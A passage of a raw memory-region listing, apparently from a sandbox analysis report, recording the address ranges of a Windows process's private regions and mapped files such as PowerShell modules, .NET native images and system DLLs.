"\\Windows\\Microsoft.NET\\assembly\\GAC_32\\System.Transactions\\v4.0_4.0.0.0__b77a5c561934e089\\System.Transactions.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_32\\system.transactions\\v4.0_4.0.0.0__b77a5c561934e089\\system.transactions.dll") Region: id = 517 start_va = 0x4240000 end_va = 0x433ffff monitored = 1 entry_point = 0x0 region_type = private name = 
"private_0x0000000004240000" filename = "" Region: id = 518 start_va = 0x3b50000 end_va = 0x3b9bfff monitored = 1 entry_point = 0x3b6fcc6 region_type = mapped_file name = "system.transactions.dll" filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_32\\System.Transactions\\v4.0_4.0.0.0__b77a5c561934e089\\System.Transactions.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_32\\system.transactions\\v4.0_4.0.0.0__b77a5c561934e089\\system.transactions.dll") Region: id = 519 start_va = 0x3b50000 end_va = 0x3b9bfff monitored = 1 entry_point = 0x3b6fcc6 region_type = mapped_file name = "system.transactions.dll" filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_32\\System.Transactions\\v4.0_4.0.0.0__b77a5c561934e089\\System.Transactions.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_32\\system.transactions\\v4.0_4.0.0.0__b77a5c561934e089\\system.transactions.dll") Region: id = 520 start_va = 0x3b50000 end_va = 0x3b9bfff monitored = 1 entry_point = 0x3b6fcc6 region_type = mapped_file name = "system.transactions.dll" filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_32\\System.Transactions\\v4.0_4.0.0.0__b77a5c561934e089\\System.Transactions.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_32\\system.transactions\\v4.0_4.0.0.0__b77a5c561934e089\\system.transactions.dll") Region: id = 521 start_va = 0x3b50000 end_va = 0x3b9bfff monitored = 1 entry_point = 0x3b6fcc6 region_type = mapped_file name = "system.transactions.dll" filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_32\\System.Transactions\\v4.0_4.0.0.0__b77a5c561934e089\\System.Transactions.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_32\\system.transactions\\v4.0_4.0.0.0__b77a5c561934e089\\system.transactions.dll") Region: id = 522 start_va = 0x6a220000 end_va = 0x6a29ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "microsoft.management.infrastructure.ni.dll" filename = 
"\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Microsoft.Mf49f6405#\\f0821980bfe2fc8375ccfc37dbe6e9d8\\Microsoft.Management.Infrastructure.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\microsoft.mf49f6405#\\f0821980bfe2fc8375ccfc37dbe6e9d8\\microsoft.management.infrastructure.ni.dll") Region: id = 523 start_va = 0x6a870000 end_va = 0x6a8b6fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.numerics.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Numerics\\e7d6ed984300c7212c6e682c4f730b1e\\System.Numerics.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.numerics\\e7d6ed984300c7212c6e682c4f730b1e\\system.numerics.ni.dll") Region: id = 524 start_va = 0xd60000 end_va = 0xd6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d60000" filename = "" Region: id = 525 start_va = 0x4150000 end_va = 0x418ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004150000" filename = "" Region: id = 526 start_va = 0x7ffae000 end_va = 0x7ffaefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffae000" filename = "" Region: id = 527 start_va = 0x75720000 end_va = 0x75727fff monitored = 0 entry_point = 0x757210e9 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 528 start_va = 0x75740000 end_va = 0x7575afff monitored = 0 entry_point = 0x757493b9 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 529 start_va = 0xd70000 end_va = 0xd7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d70000" filename = "" Region: id = 530 start_va = 0x64260000 end_va = 0x64364fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = 
"system.configuration.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Configuration\\96f7edb07b12303f0ec2595c7f3778c7\\System.Configuration.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.configuration\\96f7edb07b12303f0ec2595c7f3778c7\\system.configuration.ni.dll") Region: id = 531 start_va = 0x3b50000 end_va = 0x3bcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003b50000" filename = "" Region: id = 532 start_va = 0x19f0000 end_va = 0x19fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000019f0000" filename = "" Region: id = 533 start_va = 0x1a00000 end_va = 0x1a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001a00000" filename = "" Region: id = 534 start_va = 0x1a10000 end_va = 0x1a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001a10000" filename = "" Region: id = 535 start_va = 0x3bd0000 end_va = 0x3bdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003bd0000" filename = "" Region: id = 536 start_va = 0x3c20000 end_va = 0x3c2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c20000" filename = "" Region: id = 537 start_va = 0x3c30000 end_va = 0x3c3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c30000" filename = "" Region: id = 538 start_va = 0x3c40000 end_va = 0x3c4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c40000" filename = "" Region: id = 539 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c90000" filename = "" Region: id = 540 start_va = 0x3ca0000 end_va = 0x3caffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ca0000" filename = "" Region: id = 541 start_va = 0x3cb0000 end_va = 0x3cbffff 
monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cb0000" filename = "" Region: id = 542 start_va = 0x3cc0000 end_va = 0x3ccffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cc0000" filename = "" Region: id = 543 start_va = 0x640c0000 end_va = 0x64257fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "microsoft.csharp.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Microsoft.CSharp\\f73f48afb5512225dedaee9c88ac5050\\Microsoft.CSharp.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\microsoft.csharp\\f73f48afb5512225dedaee9c88ac5050\\microsoft.csharp.ni.dll") Region: id = 544 start_va = 0x3ce0000 end_va = 0x3ceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ce0000" filename = "" Region: id = 545 start_va = 0x3cf0000 end_va = 0x3cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 546 start_va = 0x3d00000 end_va = 0x3d0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d00000" filename = "" Region: id = 547 start_va = 0x3d00000 end_va = 0x3d0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d00000" filename = "" Region: id = 548 start_va = 0x40f0000 end_va = 0x40fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040f0000" filename = "" Region: id = 549 start_va = 0x4530000 end_va = 0x4ebffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004530000" filename = "" Region: id = 550 start_va = 0x7ffd8000 end_va = 0x7ffd8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 551 start_va = 0x75800000 end_va = 0x7580dfff monitored = 0 entry_point = 0x75801235 region_type = mapped_file name = "rpcrtremote.dll" filename = 
"\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 552 start_va = 0x4f00000 end_va = 0x4f3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004f00000" filename = "" Region: id = 553 start_va = 0x7ffad000 end_va = 0x7ffadfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffad000" filename = "" Region: id = 554 start_va = 0x4ec0000 end_va = 0x4efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004ec0000" filename = "" Region: id = 555 start_va = 0x7ffac000 end_va = 0x7ffacfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffac000" filename = "" Region: id = 556 start_va = 0x40f0000 end_va = 0x4100fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000040f0000" filename = "" Region: id = 557 start_va = 0x4110000 end_va = 0x411ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004110000" filename = "" Region: id = 558 start_va = 0x4f40000 end_va = 0x5f3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004f40000" filename = "" Region: id = 559 start_va = 0x4120000 end_va = 0x414ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 560 start_va = 0x4430000 end_va = 0x446ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004430000" filename = "" Region: id = 561 start_va = 0x7ffab000 end_va = 0x7ffabfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffab000" filename = "" Region: id = 562 start_va = 0xc70000 end_va = 0xc7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c70000" filename = "" Region: id = 563 start_va = 0xc70000 end_va = 0xc7ffff monitored = 1 entry_point = 0x0 region_type = private name = 
"private_0x0000000000c70000" filename = "" Region: id = 564 start_va = 0xc80000 end_va = 0xc8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c80000" filename = "" Region: id = 565 start_va = 0xc80000 end_va = 0xc8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c80000" filename = "" Region: id = 566 start_va = 0x5f40000 end_va = 0x6f3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005f40000" filename = "" Region: id = 567 start_va = 0x4380000 end_va = 0x43cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004380000" filename = "" Region: id = 568 start_va = 0x44a0000 end_va = 0x44dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044a0000" filename = "" Region: id = 569 start_va = 0x6f50000 end_va = 0x6f8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006f50000" filename = "" Region: id = 570 start_va = 0x7ffaa000 end_va = 0x7ffaafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffaa000" filename = "" Region: id = 571 start_va = 0x7ffab000 end_va = 0x7ffabfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffab000" filename = "" Region: id = 572 start_va = 0xc80000 end_va = 0xc81fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "powershellget.psd1" filename = "\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\powershellget.psd1") Region: id = 573 start_va = 0x6f90000 end_va = 0x738ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006f90000" filename = "" Region: id = 574 start_va = 0x4120000 end_va = 0x4121fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "powershellget.psd1" 
filename = "\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\powershellget.psd1") Region: id = 575 start_va = 0x6f90000 end_va = 0x738ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006f90000" filename = "" Region: id = 576 start_va = 0xc80000 end_va = 0xc8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c80000" filename = "" Region: id = 577 start_va = 0x4120000 end_va = 0x4120fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft.powershell.utility.psd1" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1") Region: id = 578 start_va = 0x6f90000 end_va = 0x738ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006f90000" filename = "" Region: id = 579 start_va = 0x4130000 end_va = 0x4130fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft.powershell.utility.psd1" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1") Region: id = 580 start_va = 0x6f90000 end_va = 0x738ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006f90000" filename = "" Region: id = 581 start_va = 0x63550000 end_va = 0x640bdfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "microsoft.powershell.commands.utility.ni.dll" filename = 
"\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Microsoft.P521220ea#\\45d6173bf76d6c7a206f8f41403f947b\\Microsoft.PowerShell.Commands.Utility.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\microsoft.p521220ea#\\45d6173bf76d6c7a206f8f41403f947b\\microsoft.powershell.commands.utility.ni.dll") Region: id = 582 start_va = 0x69f20000 end_va = 0x69f47fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.configuration.install.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Confe64a9051#\\1561b93d6d25c4a9c3e2659ab29a5e73\\System.Configuration.Install.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.confe64a9051#\\1561b93d6d25c4a9c3e2659ab29a5e73\\system.configuration.install.ni.dll") Region: id = 583 start_va = 0x4120000 end_va = 0x4127fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft.powershell.utility.psm1" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1") Region: id = 584 start_va = 0x4480000 end_va = 0x44bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004480000" filename = "" Region: id = 585 start_va = 0x6f90000 end_va = 0x738ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006f90000" filename = "" Region: id = 586 start_va = 0x4130000 end_va = 0x4137fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft.powershell.utility.psm1" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1") Region: id = 587 
start_va = 0x6f90000 end_va = 0x738ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006f90000" filename = "" Region: id = 588 start_va = 0x4120000 end_va = 0x412ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 589 start_va = 0x4130000 end_va = 0x4137fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft.powershell.utility.psm1" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1") Region: id = 590 start_va = 0x6f90000 end_va = 0x738ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006f90000" filename = "" Region: id = 591 start_va = 0x4140000 end_va = 0x4147fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft.powershell.utility.psm1" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1") Region: id = 592 start_va = 0x6f90000 end_va = 0x738ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006f90000" filename = "" Region: id = 593 start_va = 0x4130000 end_va = 0x413ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004130000" filename = "" Region: id = 594 start_va = 0x4140000 end_va = 0x414ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 722 start_va = 0x4140000 end_va = 0x4140fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" 
Region: id = 723 start_va = 0x4190000 end_va = 0x419ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004190000" filename = "" Region: id = 724 start_va = 0x41e0000 end_va = 0x41effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041e0000" filename = "" Region: id = 725 start_va = 0x41e0000 end_va = 0x41effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041e0000" filename = "" Region: id = 726 start_va = 0x41e0000 end_va = 0x41effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041e0000" filename = "" Region: id = 727 start_va = 0x6f90000 end_va = 0x6fcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006f90000" filename = "" Region: id = 728 start_va = 0x7ffab000 end_va = 0x7ffabfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffab000" filename = "" Region: id = 729 start_va = 0x41e0000 end_va = 0x41effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041e0000" filename = "" Region: id = 730 start_va = 0x43d0000 end_va = 0x44cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000043d0000" filename = "" Region: id = 731 start_va = 0x41e0000 end_va = 0x41effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041e0000" filename = "" Region: id = 732 start_va = 0x41e0000 end_va = 0x41effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041e0000" filename = "" Region: id = 733 start_va = 0x41e0000 end_va = 0x41effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041e0000" filename = "" Region: id = 734 start_va = 0x41e0000 end_va = 0x41effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041e0000" filename = "" Region: id = 735 start_va = 0x41e0000 end_va = 0x41effff 
monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041e0000" filename = "" Region: id = 736 start_va = 0x41e0000 end_va = 0x41effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041e0000" filename = "" Region: id = 737 start_va = 0x41e0000 end_va = 0x41effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041e0000" filename = "" Region: id = 738 start_va = 0x41e0000 end_va = 0x41effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041e0000" filename = "" Region: id = 739 start_va = 0x41e0000 end_va = 0x41effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041e0000" filename = "" Region: id = 740 start_va = 0x41e0000 end_va = 0x41effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041e0000" filename = "" Region: id = 741 start_va = 0x41e0000 end_va = 0x41effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041e0000" filename = "" Region: id = 742 start_va = 0x6fd0000 end_va = 0x700ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006fd0000" filename = "" Region: id = 743 start_va = 0x7ffa9000 end_va = 0x7ffa9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffa9000" filename = "" Region: id = 744 start_va = 0x41e0000 end_va = 0x41effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041e0000" filename = "" Region: id = 745 start_va = 0x41e0000 end_va = 0x41effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041e0000" filename = "" Region: id = 746 start_va = 0x41e0000 end_va = 0x41effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041e0000" filename = "" Region: id = 747 start_va = 0x41f0000 end_va = 0x41fffff monitored = 1 entry_point = 0x0 region_type = private name = 
"private_0x00000000041f0000" filename = "" Region: id = 748 start_va = 0x41e0000 end_va = 0x41effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041e0000" filename = "" Region: id = 749 start_va = 0x41f0000 end_va = 0x41fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041f0000" filename = "" Region: id = 750 start_va = 0x44d0000 end_va = 0x44dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044d0000" filename = "" Region: id = 751 start_va = 0x41f0000 end_va = 0x41fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041f0000" filename = "" Region: id = 752 start_va = 0x41f0000 end_va = 0x41fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041f0000" filename = "" Region: id = 753 start_va = 0x41e0000 end_va = 0x41effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041e0000" filename = "" Region: id = 754 start_va = 0x41f0000 end_va = 0x41fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041f0000" filename = "" Region: id = 755 start_va = 0x44d0000 end_va = 0x44dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044d0000" filename = "" Region: id = 756 start_va = 0x41f0000 end_va = 0x41fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041f0000" filename = "" Region: id = 757 start_va = 0x41e0000 end_va = 0x41effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041e0000" filename = "" Region: id = 758 start_va = 0x41e0000 end_va = 0x41effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041e0000" filename = "" Region: id = 759 start_va = 0x41e0000 end_va = 0x41effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041e0000" filename = "" Region: id = 760 
start_va = 0x41e0000 end_va = 0x41effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041e0000" filename = "" Region: id = 761 start_va = 0x41e0000 end_va = 0x41effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041e0000" filename = "" Region: id = 762 start_va = 0x41f0000 end_va = 0x41fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041f0000" filename = "" Region: id = 763 start_va = 0x41e0000 end_va = 0x41e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041e0000" filename = "" Region: id = 764 start_va = 0x44d0000 end_va = 0x44e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044d0000" filename = "" Region: id = 765 start_va = 0x41f0000 end_va = 0x41fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041f0000" filename = "" Region: id = 766 start_va = 0x41f0000 end_va = 0x41fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041f0000" filename = "" Region: id = 767 start_va = 0x44f0000 end_va = 0x4504fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044f0000" filename = "" Region: id = 768 start_va = 0x765e0000 end_va = 0x766d4fff monitored = 0 entry_point = 0x765e1865 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 769 start_va = 0x76320000 end_va = 0x76455fff monitored = 0 entry_point = 0x76321b35 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 770 start_va = 0x767c0000 end_va = 0x769bafff monitored = 0 entry_point = 0x767c22d9 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") 
Region: id = 771 start_va = 0x725c0000 end_va = 0x725d1fff monitored = 0 entry_point = 0x725c1200 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 772 start_va = 0x73840000 end_va = 0x738e5fff monitored = 0 entry_point = 0x738aa2f0 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 773 start_va = 0x73ae0000 end_va = 0x73b40fff monitored = 0 entry_point = 0x73b1bf40 region_type = mapped_file name = "wbemcomn2.dll" filename = "\\Windows\\System32\\wbemcomn2.dll" (normalized: "c:\\windows\\system32\\wbemcomn2.dll") Region: id = 774 start_va = 0x75400000 end_va = 0x75416fff monitored = 0 entry_point = 0x75403574 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 775 start_va = 0x73820000 end_va = 0x73837fff monitored = 0 entry_point = 0x73821335 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 776 start_va = 0x73810000 end_va = 0x7381afff monitored = 0 entry_point = 0x738152a0 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 777 start_va = 0x73620000 end_va = 0x7362efff monitored = 0 entry_point = 0x736293d0 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 1523 start_va = 0x1a60000 end_va = 0x1a60fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mpr.dll.mui" filename = "\\Windows\\System32\\en-US\\mpr.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\mpr.dll.mui") Region: id = 1524 
start_va = 0x41f0000 end_va = 0x422ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041f0000" filename = "" Region: id = 1525 start_va = 0x6fb0000 end_va = 0x6feffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006fb0000" filename = "" Region: id = 1526 start_va = 0x6ff0000 end_va = 0x702ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006ff0000" filename = "" Region: id = 1527 start_va = 0x7050000 end_va = 0x708ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007050000" filename = "" Region: id = 1528 start_va = 0x7110000 end_va = 0x714ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007110000" filename = "" Region: id = 1529 start_va = 0x7200000 end_va = 0x723ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007200000" filename = "" Region: id = 1530 start_va = 0x7270000 end_va = 0x72affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007270000" filename = "" Region: id = 1531 start_va = 0x73a0000 end_va = 0x73dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000073a0000" filename = "" Region: id = 1532 start_va = 0x7ffa7000 end_va = 0x7ffa7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffa7000" filename = "" Region: id = 1533 start_va = 0x7ffa8000 end_va = 0x7ffa8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffa8000" filename = "" Region: id = 1534 start_va = 0x7ffa9000 end_va = 0x7ffa9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffa9000" filename = "" Region: id = 1535 start_va = 0x7ffab000 end_va = 0x7ffabfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffab000" filename = "" Region: id = 1536 start_va = 0x7ffae000 end_va = 0x7ffaefff 
